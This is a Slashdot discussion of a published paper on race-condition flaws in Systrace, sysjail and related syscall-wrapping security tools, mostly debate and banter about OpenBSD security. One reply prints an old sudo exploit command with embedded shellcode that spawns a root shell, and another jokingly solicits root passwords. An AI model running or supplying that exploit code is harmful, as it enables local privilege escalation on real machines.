Cambridge Researcher Breaks OpenBSD Systrace

An anonymous reader writes "University of Cambridge researcher Robert Watson has published a paper at the First USENIX Workshop On Offensive Technology in which he describes serious vulnerabilities in OpenBSD's Systrace, Sudo, Sysjail, the TIS GSWTK framework, and CerbNG. The technique is also effective against many commercially available anti-virus systems. His slides include sample exploit code that bypasses access control, virtualization, and intrusion detection in under 20 lines of C code consisting solely of memcpy() and fork(). Sysjail has now withdrawn their software, recommending against any use, and NetBSD has disabled Systrace by default in their upcoming release."

SELinux and the same ...

[Gopal.V]

James Morris has put up an analysis of the same vulnerabilities.

And pushing the system code down into lower echelons of execution (i.e kernel), the way SELinux does it, is a valid fix.

Re:SELinux and the same ...

[afidel]

I wonder what the performance penalty would be for thunking to kernel space would on every such operation would be? If it was well implemented I would guess it would be minimal since you could just pass the call off to the called kernel object directly. I also wonder what if any security vulnerabilities would be exposed by moving that extra code in kernel space. I know for the TrustedBSD tools it would be minimal due to their strict code checking policies, but for other systems having this much extra code in kernel space might be a risk.

Re:SELinux and the same ...

[gwern]

If the message-passing microkernels are any guide, thunking on every kernel call could be very expensive unless you go to great lengths (like L4) to avoid it.

Re:SELinux and the same ...

[makomk]

Just putting the validation code in the kernel is not, by itself, sufficient - it's important that any arguments are copied from userspace exactly once. If the validation code and the actual syscall code each do their own copy from userspace, this is a potentially exploitable security issue.

Re:SELinux and the same ...

[Jokkey]

I wonder what the performance penalty would be for thunking to kernel space would on every such operation would be?

What's being discussed here is system call wrapping, and system calls by definition go to kernel space anyway. No extra thunk to kernel space is required.

Re:SELinux and the same ...

[DrSkwid]

> I know for the TrustedBSD tools it would be minimal due to their strict code checking policies

I hope that works out for them because "Secure by default" and "Unbreakable" are amusing rhetoric.

Linux?`

[morgan_greywolf]

Any word if any of these vulnerabilities affect Linux or other Unixes as well?

Re:Linux?`

If you use systrace on Linux, yes. I can't think of any mainstream distributions that ship systrace, though, so I believe this vulnerability is a non-issue for the Linux crowd. As for other unices - I have no idea, but I doubt it. OpenBSD's sudo is vulnerable because it has a systrace monitor mode, but sudo on Linux doesn't - so it should be ok.

Apposite

[frisket]

Offensive Technology

Microsoft Windows?

Re:Apposite

apposite

Since NetBSD seems to be affected as well...

[bomanbot]

are other UNIX-based Operating Systems vulnerable as well? Systrace and especially Sudo are very common in nearly all UNIX-like Systems, so maybe Linux and MacOS X users should also be concerned? And what about Windows, since commercially availabe anti-virus systems are also afflicted? That seems like a very serious vulnerability to me...

Re:Since NetBSD seems to be affected as well...

[makomk]

Only an experimental feature in a prerelease version of sudo is affected by this vulnerability; normal users of sudo have nothing to worry about.

Re:Since NetBSD seems to be affected as well...

[ratboy666]

Given that the vulerability exploited is a system call race, it may be that the "unwrapped" system calls may be exploited as well.

Basically, wrapping the call (supposed to increase security) make the race more exploitable. It is NOT "sudo" that is at fault, specifically, because sudo (in its current release) does not do call wrapping.

There is an easy solution available -- simply disallow all execution between the time the system call is invoked, and all parameters have been copied to system space. Alternatively, do not allow threading, and mapping of memory used for parameters in an active call (a bit more difficult).

A security audited system call interface is needed, along with a prohibition on wrapping system calls expected by an application (because those wraps could be exploited by an attacking program).

And you are right -- Windows is probably more vulnerable to this, simply because there are more system calls that use buffer pointers.

But this entire class of exploit is "local only", which means that the system needs to be comprimised another way first; this can be used to obtain root, or use unauthorized resources.

SELinux can be used to prevent much of the damage possible, as can Trusted Solaris. I don't know if there is a Windows eqivalent.

Re:Since NetBSD seems to be affected as well...

[SpaceLifeForm]

Windows equivalent: Shut Down

Re:Since NetBSD seems to be affected as well...

[Znork]

Most security applications implemented as system call wrappers would be vulnerable (basically anything where there's an opportunity to modify the checked system call post-check by tricking todays modern and eminently interruptable kernels into doing something else than getting on with executing the syscall for a few cycles), altho I suspect that anyone running sudo as primary security enforcement and logging application isnt exactly worried about this level of fairly arcane exploits (note that more lowlevel solutions like SELinux are not affected).

More interesting would be wether it means that commercial security software like CA's eTrust access control is also inherently ehm, untrustable. It certainly sounds like it would be.

so much for...

[Fyre2012]

...Only two remote holes in the default install, in more than 10 years!

It's unfortunate too tho, considering that OpenBSD is heralded as one of the most secure *nix's around. Looks like it's patch time for many.

Re:so much for...

[NeoTerra]

I'm scared when something complex has no patches. Then again I'm more scared when something complex has a LOT of patches.

Re:so much for...

[MrNaz]

Why didn't you just say "I'm scared." ?

Re:so much for...

[ArwynH]

And it still only has had two remote holes in the default install in more than 10 years. This isn't a remotely exploitable hole, it allows privilege escalation, which requires access to the system and thus is a local hole. It's still a whopper of a hole though...

Re:so much for...

[orclevegam]

Because sometimes I guess the patch level is "just right"?

Re:so much for...

This idea that only holes in the default install count is kind of silly. If there's a remote hole in the FTP server then it certainly is an issue for people who want to run the FTP server.

Re:so much for...

[teknopurge]

Then choose a better FTP server - it's not OpenBSD's fault you installed pr00tme-ftpd.

I can also publish a root password for my servers on digg. Does that mean it's OpenBSD's fault for that 'exploit' as well?

The purpose of the default install is a configuration that has been audtied by _the_ most anal development team on the planet. This is nothing but a good thing, and if people have a problem with Theo's attitude, feel free to fork the codebase.

On my list of the 10 best OSS projects, OpenBSD is in the top 5.

Re:so much for...

[EvanED]

On my list of the 10 best OSS projects, OpenBSD is in the top 5.

In other words... it's in your list of the 5 best OSS projects.

(sorry)

Re:so much for...

[DrSkwid]

OpenBSD auditing isn't the god of all auditing you think it is.

This is just another piece of audited code that roots you.

Re:so much for...

[Hatta]

It's a marketing slogan, of course it's silly. "Only two remote holes in the default install, in more than 10 years!" means about as much as "99 44/100 percent pure."

Re:so much for...

Hes talking about apps that come with OpenBSD but are inactive by default.

By your logic people should just ship unix with the boot loader and kernel and claim to be the most secure OS in the universe.

Re:so much for...

[pathological+liar]

That's one of the things that bugs me about OpenBSD: the ludicrous distinction between local and remote root exploits.

Yeah, maybe you've got some ultra-locked down OpenBSD machine that doesn't actually do anything, but for most users, that latest phpBB bug that you ignored? It just effectively made the latest local kernel exploit a remote hole. For almost all users, the differentiation between local and remote holes is blurry at best. Minor vulnerabilities can and will be chained together to create a big problem.

... but that's okay, this is just a local hole, right?

Re:so much for...

[Plutonite]

On my list of the 10 best OSS projects, OpenBSD is in the top 5.

In other words... it's in your list of the 5 best OSS projects.

(sorry) Mod parent up! In security related topics nitpicking is encouraged. No apology needed.

PS: Can we have the list please? They are always interesting and provide good flamewar material.

Re:so much for...

[teknopurge]

well-played old chap.......... ;)

Re:so much for...

[turing_m]

You ruined his build up!

It's not just in the top thousand OSS projects. It's not only in the top hundred. It's not even just in the top ten OSS projects. It's in the TOP FIVE! Not only does it have ls, cat, grep and sed, if you order within the next 5 minutes we'll even throw in openssh free!

Re:so much for...

[jimicus]

Let's be reasonable about this for a moment.

Once someone has the power to execute arbitary code on your system, then it is arguably only a matter of time before they can do what they please on it. Which is precisely why you don't use the same OpenBSD box for your firewall as you do for giving users a shell account on a Unix box.

Re:so much for...

It's only a local exploit if you use something that uses it. By default, nothing uses systrace.

Re:so much for...

[jpkunst]

On my list of the 10 best OSS projects, OpenBSD is in the top 5.

In other words... it's in your list of the 5 best OSS projects.

(sorry)

In other words ... it's at number 5. (If it was at number 4, he would have said is in the top 4, etc.)

JP

What should individual users do

The article says that vendors have been given 6 months - several years notice.
Does anyone know what OpenBSD has done, or what individuals who use OpenBSD should
do in light of this article? Specific instructions please!

Re:What should individual users do

[bberens]

The workaround is very complex. Send your IP and root password to pwnd@dodgeit.com and I'll take a look at your system to help make recommendations.

I'm not worried

[Gazzonyx]

I'm not worried about a vuln. in sudo; I always log in as root and don't have sudo running :). Remember, Real Programmers log in as root. Take that h4x0rz!

Re:I'm not worried

[eno2001]

You know the old saying... "you get what you stay for". As long as you're logging in as root you will damage your system. It's a known fact. Anyone who logs in as root eventually dostoyevsky's their system. Logging in as root is dangerous. Even using 'su -' is dangerous. 'sudo' provides some level of security and accountability but even that is dangerous. I can't tell you how many times I've seen people type 'sudo bash' and then tool around doing everything as root all the time. The only way to really be safe is to never use any super user abilities whatsoever. The way I've handled it is that any time I run into something that I need root access for, I just give up. So I don't have any new users other than the ones I originally set up when I installed Ubuntu. I also don't have any access to the CD-RW drive built into the system, but that's OK since I'm not an illegal music and software pirate (only pirates use CD-R/CD-RW). I can't use the attached scanner that once worked in Windows 98 but that's OK since there is no need to scan photos or anything in Linux since there are no apps with which to work on them anyway. Whenever the system pops up asking me for the root password I just cancel out and stick with whatever settings the system had. Basically for me, a request for the root password is a threat to the security of my PC, myself and possible the nation or even global security. So in short DO NOT EVER USE root access of ANY kind. It's very dangerous and best left to the experts (bearded and bald scientists in dusty university halls).

Re:I'm not worried

I bet you were modded troll just because of that lame ass saying.

Next time try: "With great power comes great responsibility." -Spider-Man

Re:I'm not worried

[DrSkwid]

The successor to Unix got rid of root altogether from the OS.

I prefer a boast like "Nothing to escalate" than "Secure by default"

Re:I'm not worried

[nuzak]

> Anyone who logs in as root eventually dostoyevsky's their system.

I'm unfamiliar with Dostoyevsky as a verb. Explain?

> So in short DO NOT EVER USE root access of ANY kind.

I agree. That's why the OS should drop it entirely. Plan9 did. And MLS systems get one thing right: the role that's able to alter security contexts itself has virtually no access to anything else.

Re:I'm not worried

I'm running Windows 95, so I don't need to worry about this vulnerability.

Re:I'm not worried

or 'sudo su -' if sudo is not setup and configured properly...

Re:I'm not worried

[An+ominous+Cow+art]

You're living on the edge, man. Don't you realize that by logging in as a user, any user, you put your precious files and data at risk? That's why the only wise decision, when faced by that "login:" or "Username" prompt, is to shut the machine down and just walk away. It's not worth it.

Re:I'm not worried

[empaler]

Anything using more than 10W is a security risk to your data.

Re:I'm not worried

[bl8n8r]

Thank God! A user that finally gets security! Look at those pigs wizzin by...

Re:I'm not worried

idiotic!

Re:I'm not worried

[Alsee]

WHAT IN HELL IS THIS THING?
It's called a 'snowball' sir.

-

Re:I'm not worried

[agbinfo]

"With great power comes great responsibility." -Spider-Man

Wasn't it Ben Parker who said that?

No need for alarm!

[Antarius]

The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

Re:No need for alarm!

[nateb]

The tremors that you are feeling are from the sounds of the collective users of OpenBSD all simultaneously shouting "Fuck!" in exasperation.

All twelve of them. :)

I like the thought of openbsd, though, having never used it. I'm sure everything will be fine.

Re:No need for alarm!

Both of them?

Re:No need for alarm!

[Dan+Ost]

OpenBSD is my favorite platform for purpose-built machines. I do appreciate the security, but the main reason I like it is for the quality documentation (especially the man pages!) and the ease of setup.

The majority of my machines run Gentoo, but Gentoo can't really by used as a fire-and-forget platform like OBSD can be.

Re:No need for alarm!

[guruevi]

I didn't know they could BOTH shout thatloud.

Re:No need for alarm!

[Antarius]

They have big voices?

"Pay no attention to the Pufferfish behind the curtain"

And the most popular response to the halving of the OpenBSD userbase for humorous reasons:

"It's a sign that OpenBSD is a Mature O.S. So mature that the userbase has gone through puberty!"


[Whaddya mean "youdongeddit?" Puberty. You know; when a boys balls drop. The voice gets lower... Aw, forget it.]

Re:No need for alarm!

[peacefinder]

All twelve of them. :)

We yell really loud.

(And I actually yelled "Wow!". We're not a homogenous lot.)

Re:No need for alarm!

[MysteriousPreacher]

That's 13 now, I just picked up the disks a little while ago.

OpenBSD will never have the popularity or wide range of ports that FreeBSD has but it's a pretty solid system designed with a clear mandate. It's worth installing, even just to see the security decisions that have been taken so you can apply them to another Unix-like system. Like Dan Ost said, the documentation is excellent and the developers and mailing list users have been pretty helpful. The only thing I'm missing is WPA support.

Re:No need for alarm!

[Dausha]

This exploit was forseen over 30 years ago by Obi-wan Kenobi:

"What's wrong?" asked Luke.

"It's as if millions of OpenBSD coders suddenly cried out in terror, and were suddenly silenced. I fear something dreadful has happened. You'd best disable sudo."

Re:No need for alarm!

How can five guys make that much noise

Re:No need for alarm!

[WyrdOne]

Might want to do your research a bit more. OpenBSD is very useful for VPN Tunnels, Firewalls (some of the easiest to configure and most powerful), routers, etc.

I run OpenBSD as a firewall OS and I challenge anyone to gain root on a similar setup, since it has no IPs on it's interfaces it might be a bit hard.

http://www.openlysecure.org/openbsd/how-to/invisib le_firewall.html

Re:No need for alarm!

[empaler]

I actually tried yesterday, but found the installation process to be too time-demanding of me (I just wanted a friggin' DHCP server)

Re:No need for alarm!

[aliquis]

What? It takes 10-15 minutes to install and 2 to turn it into a dhcpserver? Check the FAQ.

Re:No need for alarm!

[empaler]

Took more than a minute to understand their partitioning scheme, too much trouble for the purpose.

Re:No need for alarm!

[aliquis]

It's quite simple really, you first create a BSD slice, which is what you would call a partition in MS-DOS, then inside that one you put your partitions using disklabel. Partition a is always the root partition, b is always swap, c is the whole BSD slice, d is the whole disk, e-z is whatever you want them to be.

And you could always let it use the whole disk if you want to.

Re:No need for alarm!

[empaler]

And you could always let it use the whole disk if you want to. So it could actually work without a swap partition? (Swap on a DHCP-server?... Not really needed)

Re:No need for alarm!

[aliquis]

The option "use entire disk" only sets it to one slice on the whole disk, you can still partition it in any other way if you want to, but just make no b-partition if that is what you want, or make one first and set a for whatever the rest is.

Re:No need for alarm!

[empaler]

Just for your kindness of replying to me, I'll give it a shot next time I'm at the office.
My vacation started today though, and I'll be pretty disconnected. (Betcha ten bucks I'll abuse any internet connection I can get near to browse /.)

Re:No need for alarm!

[empaler]

(btw, your home page seems to be dead)

Re:No need for alarm!

[aliquis]

It's been for long, the motherboard started to burn so the machine is dead, it was quite boring anyway :D

(I only posted "intresting stuff" and not diary kind of stuff, but I don't know how useful it where for other people anyway, also I decided to write in swedish instead of english for most stuff.)

All my much older webpages are dead since long.

Re:No need for alarm!

[aliquis]

Uhm, no Internet connection? Where do you live?

100/10 here ;/

Re:No need for alarm!

[empaler]

Hehehe... Jeg bor lige ovre på den anden side af Øresund; jeg skal dog på ferie i den sydlige ende af landet (Møn, hvis du kender til Dansk geografi).
En hel uge hvor jeg ikke skal tænke på systemoppetid :-D

no

[rubycodez]

these are exploits for a local user on system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get.

Re:no

What if you can get a user shell by using an exploit in (firefox|x-chat|bind|apache|ftp|ssh|sendmail|ntp|w hatever open port)?
Guess you get what you deserve when you put a machine on the internet.

Sure it is only an unprivileged local user, what could you do with that.

Oh, wait. You could get root if you had a local user using an other exploit.

Re:no

[Steve+Baker]

Exactly, why would anyone want to put a computer on the internet? That's just stupid!

Re:no

[Hatta]

Why? Isn't that what multiuser networked operating systems are for?

Re:no

And a poorly written server side script has never given base level access to the underlying machine to remote users?

Re:no

[shadowmas]

these are exploits for a local user on system, anyone who puts a machine on the internet and lets people log into actual Unix accounts deserves what they get. Unless of course they did it because they live in the real world and actually practical requirement needing that to be done.

While we're disabling any form of shell access for any reason whatsoever, why not stop all those HTTP servers as well and the SMTP, DNS and all that crap as well. After all anybody who dares expose such a system on the internet when history tells us that there will be new vulnerabilities found in those software is obliviously an idiot.

Re:no

[rubycodez]

actually, no, if you're providing services for untrusted users. the user authenticates to and uses a service, but never to machine account to possibly run code on the machine. Local users ALWAYS can mess up a machine, there's no end to the ways they can do it.

Re:no

[rubycodez]

If someone has need for a local account on a machine or any ability to run arbitrary code you're in the same realm as company hiring employee and trying to verify if they are trustworthy or not. Local user can always cause problems if they so choose. Just like anyone with physical access can cause even more problems.

Re:no

[krack]

obliviously an idiot. I has a new favorite word!

why give much of a crap

[rubycodez]

on local user/software exploits? my domains have over a thousand users, but no one logs into an account on the machine.

Re:why give much of a crap

[xaxa]

I have SSH access to some machines I have webspace on (with Fasthosts, I think). I think they use GNU/Linux, but presumably there are people offering the same service but with BSD.

Re:why give much of a crap

[Alioth]

Local exploits are only a phpBB vulnerability from being a remote exploit. If you're running a hosting service, and you're not treating local vulnerabilities as seriously as remote ones, it's only a matter of time before your machine is pwned and becomes a spam zombie. I've seen it happen.

If you allow scripting on your server, then you've essentially given your users shell access, anyway.

Re:why give much of a crap

[edunbar93]

Oh, that's easy. Because when an attacker breaks into someone's CMS (because your users most certainly do not read about security updates on software mailing lists, and there's no way in hell you even know what they're running), suddenly that attacker *does* have a login on that machine. They can now run software as the "httpd" user. This is the reason jail(8) was invented. And what do you know... they found a vulnerability in a certain version of jail.

Re:why give much of a crap

[teknopurge]

very untrue.

php, for example, has a disable_functions parameter that prevents scripts from doing thing they should not be doing.

I feel for the hosting companies that you have been with that do not audit their boxes.

Regards,

Re:why give much of a crap

[rubycodez]

bullshit, crap code by incompetent programmers causes input data to be executed, the scripting languages all have ways to flag data as tainted suspect and deal with it properly with no possibility of execution (e.g. sql injection attacks, etc.) Piss poor development practices will always lead to security breaches, and that goes for any language not just the scripting ones. The biggest and most damaging attacks have been due to sloppiness in the c/c++ realm (ooo, who would ever give us more data than we expected, etc.)

Re:why give much of a crap

[DrSkwid]

If you sleep at night on the strength of PHP's codebase then you should make sure your phone is turned off to save you being woken by the "we've been rooted" call.

Re:why give much of a crap

[isolenz]

If you allow scripting on your server, then you've essentially given your users shell access, anyway.

you have to remember that with openbsd, apache runs in a jail which when set up right limits the user to only the php functions which are currently enabled on the system (in the php case), without the ability to call (exec) other programs. Bundle that with a firewall running on the local machine limiting what traffic can be passed out (by states obviously, so it can't originate on the local machine and send out via port 25 for example) can be very effective against attacks, and mitigating problems if someone can get into the system (everyone should make sure that they know how to find people if they do get into the system in the first place though).

Although, as your original statement says, any vulnerability should be addressed very seriously, and my response above does not make it alright to forget about these situations.

just my two cents

Re:why give much of a crap

[teknopurge]

I never implied that we rest everything on PHP's codebase. But using things like suexec, PHP'ss disable_functions parameter, and other isolation tools, I can leave my phone on all night without being concerned about that phone call.

OpenBSD Security

[pathological+liar]

... now if only this would lead to a little ego deflation and humility among OpenBSD developers.

As long as I'm dreaming, I also want a pony.

Re:OpenBSD Security

[teknopurge]

Parish that thought.

Because of their egos, a fix is likely being commited to CVS as we speak.

Re:OpenBSD Security

[frenchbedroom]

Parish that thought.

You mean like, put it in a convent or something ? Oh no, I get it, you mean he should build a little chapel in memory of it, right ?

Re:OpenBSD Security

[widman]

There are about a hundred active OpenBSD developers, spread all around the globe. Why do you talk like you know them? Why the insult?

Slashdot crowd at it's best, giving you 3 positive points total. It's sad.

Re:OpenBSD Security

[Arkham79]

Obligatory Pony Response :)

No released version of sudo affected

[millert]

The sudo systrace support is part of an experimental feature ("monitor mode") not present in any of the real sudo releases (though the code is available via anonymous cvs). Given the deficiencies of systrace (and ptrace) it is unlikely that this feature will be present in any future sudo release.

  - todd

Re:No released version of sudo affected

[fimbulvetr]

Hello Todd.

Thanks for sudo, and thanks for this clarification.

Re:No released version of sudo affected

Someone upmod this guy, he's the developer of sudo.

Re:No released version of sudo affected

hi todd, remember me? ./sudo
`perl -e 'print "-p h%h%h%h%h" .
"A"x11188 .
"\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\ x07\x89\x56\x0f\xb8\x1b"
"\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\ xd1\xcd\x80\x33\xc0\x40"
"\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh" .
"AAAAAAAAA" .
"\xff\xff\xff\xff\x18\xeb\xff\xff\xff\xb4\xb6\x05\ x08\xa1\xdc\x06\x08%"'`
`perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`
`perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`
`perl -e 'print "a"x3000'` `perl -e 'print "a"x3000'`

good times that.

Re:No released version of sudo affected

[psmears]

Given the deficiencies of systrace (and ptrace) it is unlikely that this feature will be present in any future sudo release.

That's a shame...

Granted, as the paper shows, it's of no use as a feature for preventing your box from getting pwned. But the it can still be useful: often I'm more worried about the system being brought down by local users with root access, than by external forces. These users can be trusted not to break things deliberately, or overwrite the logs, but not necessarily to remember everything they've recently done when something goes wrong. ("Oh, yeah, I deleted /etc/passwd. Didn't think it was important, so I didn't tell you I'd done it. Is that why I can't log in then?")

Re:No released version of sudo affected

http://252.angelcities.com/

Re:No released version of sudo affected

[epine]

Yes, as per usual, the tribalism reflex on this thread has shut down useful brain circuits in most of the posters. Gorged with tribalistic lust, the average post here seems to be able to consider only the issue of getting pwned, or the paranoid dichotomy between useful and secure, or the purportedly paltry size of the OpenBSD user base, or the irritating slogan at the top of the OpenBSD home page (which hardly negates their contributions to the security ecology since the inception of the project no matter how sour the partisan).

The useful insight here is that systrace implemented on top of clone is a relatively pathetic defense againt malicious adversaries. So be it. That's not the only scenario to consider. It could possibly be applied to remove setuid from a long running daemon process that only requires the secure call during startup, which could be arranged to occur with the single in single-user mode. It can be used as a research tool with an unfamiliar application to discover how many system calls it makes which require elevated security. It can be used to configure a systrace profile for an application that will eventually be ported to a secure, kernel-based implementation of syscall. Or it can be used as suggested, to help protect the sytem from unwitting blunders that might otherwise have remained possible.

Given a choice, I think the OpenBSD would prefer to see secure applications written to drop privs for the client threads. In general terms, applying systrace to impose security after-the-fact is doomed to fall far short of deploying an application architected from a security standpoint to begin with.

The BUGS entry at the bottom of the OpenBSD systrace man page makes it quite clear that, as presently implemented, this little piggy lives in a house of straw. Not the best foundation for retrofitting iron bars on the windows and doors, as the sysjail project has attempted to do.

Re:No released version of sudo affected

Isn't the right alternative to this to add a proper OS audit facility, such as found in every other major OS, including Windows, Solaris, FreeBSD, and even some Linux versions?

Code isn't up (thank goodness)

[xC0000005]

It appears he's removed the code from the presentation (though it still says it's present, I don't see it). Good.

Re:Code isn't up (thank goodness)

you're not too brillant, are you ?

Thanks God.

Ha Ha

[UnknowingFool]

Sweet justice! My Win98 boxes have finally protected me against a hole. I am invinci*^&#%
$#%#^&&!#$@$

[CONNNECTION LOST]

Brace for impact...

[Mattintosh]

Theo DeRaadt goes on a rampage in 5... 4... 3... 2...

Re:Brace for impact...

De Raadt doesn't do Rampages, he only does games available via console, like Tetris, Hunt and Hangman.

He also doesn't get upset about problems being found in software, like any sane person, he's more afraid of the problems he's not finding out about.

Re:Brace for impact...

[arehnius]

Correct me if I'm wrong, but Robert Watson is a kind of security guru for FreeBSD, isn't he ? From his page :

Robert Watson (FreeBSD Home Page) : I'm a FreeBSD Core Team member, as well as member of the security officer and release engineering teams. I hope nobody will take it as a plot of FreeBSD to gain/keep lead over other BSDs.

Re:Brace for impact...

[mulvane]

The BSD's work pretty closely together and if he did find something in another BSD, it could be very possible he was looking into a feature to port over and doing his own testing of the code before hand found this. Is this what happened? I am not sure, but it is possible. The BSD's are really in a non-compete status with each other and are more in a sharing of knowledge of the forks of the original base.

Re:Brace for impact...

He also doesn't get upset about problems being found in software Michael Buesch would beg to differ.

like any sane person, he's more afraid of the problems he's not finding out about. Two problems with this: you're making the assumption that Theo is sane, and that being upset about one thing precludes the possibility of being upset about something else.

Re:Brace for impact...

Michael Buesch is a sodding douche who jumped the gun and instead of actually talking to people started screaming bloody murder, and Theo was not upset about the problem in the code so much as Michael Buesch being said douche. Read the threads, it's almost entirely based on Theo saying, "you didn't have to be a fucking asshole about it."

Re:Brace for impact...

[peacefinder]

Robert Watson is apparently the fellow who suggested porting systrace to FreeBSD. Seems like he's been working on this for a long time.

"I hope nobody will take it as a plot of FreeBSD to gain/keep lead over other BSDs."

I shouldn't think so. At least for sysjail, this problem affects "All versions [...] on all architectures." It doesn't seem to be an OpenBSD-specific problem, but with many implementations of systrace(4). If FreeBSD has already fixed their systrace, then presumably the other BSDs will be looking to them for some ideas on fixing the issue.

Although, pinning it to OpenBSD in the headline was good for both demonstrating the seriousness of the issue and for generating more pageviews. :-)

Re:Brace for impact...

Yes, because stealing someone else's source code is somehow a "mistake" and not "being an asshole." Theo was just trying to take the sting out of the fact that code was stolen. That would be like me stealing your car, giving it back, and then calling you an asshole for being such a jerk and calling the cops. Fuck that. When you're wrong, you're wrong. Code was stolen, and Theo defends the guy like it's his son or boyfriend. Get over it, accept that your "boy" did wrong, and move the fuck on.

And seriously, Theo telling someone not to be an asshole? Even if we ignore the theft, that's the kettle filing an affirmative action suit against the pot.

BT has BB

Re:Brace for impact...

Before posting, please learn the English language if that is the one you're going to post in.

Stealing requires that the act deprive the rightful owner of the property access to it.

Copying something, especially a digital work, does not deprive the rightful owner access, it increases the number of properties which exist. This deprives the creator of the initial work potenial gain from their control of the work.

That is what is called copyright violation, unless the terms under which a work is released permits duplication.

What happened with the bcw driver was not stealing, nor copyright violation, it was breach of contract.

The terms under which the code which you think was stolen were broken, the terms being those of the GPLv2.

It was incorrect of the developer to upload code drawn straight from a GPLv2 source, without including that licence, true, but it was a simple mistake that is easily done and has been done before in the past. In fact, when many companies have taken GPLv2 code and used it in binaries without releasing the source at all, they've been warned that that was a breach of terms, and asked to correct it. It's done quietly, politely, as if between two rational parties.

That was not what was done in the case of the bcw driver's violation, straight off the mark an OpenBSD developer was called a theif and was persecuted, not even an iota of benefit of the doubt, straight to an attack on the person on a personal and professional level.

You are a seriously deluded little fuck with a chip on his shoulder, and a grudge against de Raadt, that's a shame. I know if I made a mistake I'd want my superviser to defend me and say, "hey, the kid fucked up, back off and cut him some slack."

Afterall, the code which was copied was only in CVS for a short time, it was never released as an actual work, it also was never even functional. De Raadt stated this, and it is true, it's very simple and people like you refuse to let it seep in to those brick-heads of yours.

Who better to recognise an asshole than an asshole, asshole.

Re:Brace for impact...

[808140]

I agree that it wasn't stealing -- but it was indeed a copyright violation. Ignoring all the hoopla that followed for a moment, we have a situation where a developer uploaded a bunch of GPLd source, did not indicate that it was GPLd source, and, here's the important part, made it publicly available via CVS.

There are two things to consider here, both of which are important. First, from the perspective of a BSD developer: with no indication that the code was GPLd code, and given that it was on a public OpenBSD CVS server, it would be reasonable to assume that it was available under the BSD license. Of course, in reality, it wasn't, it was available only under the terms of the GPL, which as you know, applies equally to derivative works. So said BSD developer, unaware of the situation, might have taken GPLd code and incorporated it innocently into his own, BSD-licensed code, believing that he was using BSD code.

Think about this for a second: you're writing some code for a small project without source control. You find some useful BSD-licensed code on the internet and gleefully incorporate some of the routines into your program. Development continues. Then, later, it comes out that the code you incorporated was not BSD-licensed, it was GPL. Oops -- now you're fucked, because unless you can remember exactly what you added, you may be forced by the GPL to distribute the whole package under the terms of the GPL. In this way, Theo and co may very well have fucked quite a number of BSD developers. There's no way of knowing -- it was an open CVS server, after all, who knows how many people took code and what they did with it? Given that it was a driver, perhaps there weren't that many, but the point is, we'll never know. This, by itself, should demonstrate to you how ill-advised the whole thing was.

But wait, there's more. Theo indicated in the thread that there was no intention to distribute any of that code, and that it would all be replaced. All well and good -- until you consider that piece-wise replacement of GPLd code probably constitutes a derivative work -- to be safe, the general legal consensus is that a clean-room reimplementation is the only way to ensure that you aren't just creating a derivative. Remember, the GPL is a "viral" license. The only way you're allowed to use it is if you agree to provide all derivative works under the GPL as well. That would mean that by using GPLd code, even if they replaced every line in every file, they would still be forced to release their code under the GPL.

Listen, I've been using OpenBSD since the 2.x days, and I really like the product (I always buy the CDs, I have the stickers plastered all over my firewall, etc). I know that Theo's abrasive personality often has people saying that he's wrong when he's not, just because they don't like his delivery. And normally, I'm one of the first to defend him. But in this particular instance, what they were doing wasn't right, it could have harmed BSD developers, and creating a driver using a GPLd skeleton, whether it was ever functional or not, would have resulted in a work that by law would have been GPLd -- releasing it under the BSD would have been a copyright violation.

Those are the facts. Unfortunately.

Re:Brace for impact...

You find some useful BSD-licensed code on the internet and gleefully incorporate some of the routines into your program. Development continues. Then, later, it comes out that the code you incorporated was not BSD-licensed, it was GPL. Oops -- now you're fucked, because unless you can remember exactly what you added, you may be forced by the GPL to distribute the whole package under the terms of the GPL

That's purely hypothetical. In this specific case there was no chance of that happening. The code was specific to a driver (non functioning at that). Who the hell is going to incorporate bits of that into their own project?

The reality is that someone forgot to include a license. And the original developer acted like a total asshole.

Re:Brace for impact...

Indeed, who the fuck incorporates non-working drivers into their projects? Nobody but the people developing them. MB was a dickhead and couldn't even for a second behave rationally, his douchebaggery in handling a simple situation that could have easily been corrected in minutes, became a five day fiasco because he didn't have the decency to treat another human with any kind of respect.

Re:Brace for impact...

[808140]

That's purely hypothetical. In this specific case there was no chance of that happening. The code was specific to a driver (non functioning at that). Who the hell is going to incorporate bits of that into their own project?

This is kind of like fucking a girl who talks like a virgin without wearing a condom and saying there's no chance you'll get an STD from her. Sure, she looks clean, but how can you really know? You're taking a risk. It may be a calculated risk, but it is a risk nonetheless.

The original developer may or may not have acted like a total asshole -- everyone in the BSD camp says he was, and everyone in the GNU camp says Theo was being a dick. Listen, I don't care either way. Among hackers, delivery isn't what's important, what's important is being right. This is why Theo and Linus both routinely flame the shit out of people who don't know what's up and are still respected.

Here's the deal: if MB had quietly contacted Theo and co as the latter group would have liked, instead of making a big deal about it on a public mailing list, no one not part of the inner circle would have known about it. This is all well and good if what you care about is saving face, but it sucks dick if you're a BSD developer who took some of that code and now has no idea he's infringing. By putting GPL licensed code on an open server, they made this possible. Because a big deal was made about it, anyone likely to have downloaded code from there now knows that the code he took was GPLd and not BSDd as was implied.

I know, I know, you're saying that odds are, no one took any code and incorporated it into projects, that all the CVS check outs of the code were made by people who were interested in the driver and nothing else. But here's the deal: all of those people checking out that code were barebacking a girl with an STD, to use my colorful analogy. The STD was the GPL. Maybe they caught it, maybe they didn't -- but they had a right to know. Wanting to cover it up is like being too embarrassed to tell your boyfriend that you got the clap that night you went out to the bar without him. Who wouldn't be? But what's the right thing to do in this situation? Tell him to get himself checked, or risk his health by pretending you're still a daisy-fresh girl?

The beauty of fanboys

Mmmm.... fanboys.

I want to lick them all over.

fix shedules ?

anyone know how or when these things are supposed to be fixed ?

as usual I would assume *bsd to put out fixes quite timely...

Re:fix shedules ?

[orclevegam]

as usual I would assume *bsd to put out fixes quite timely...

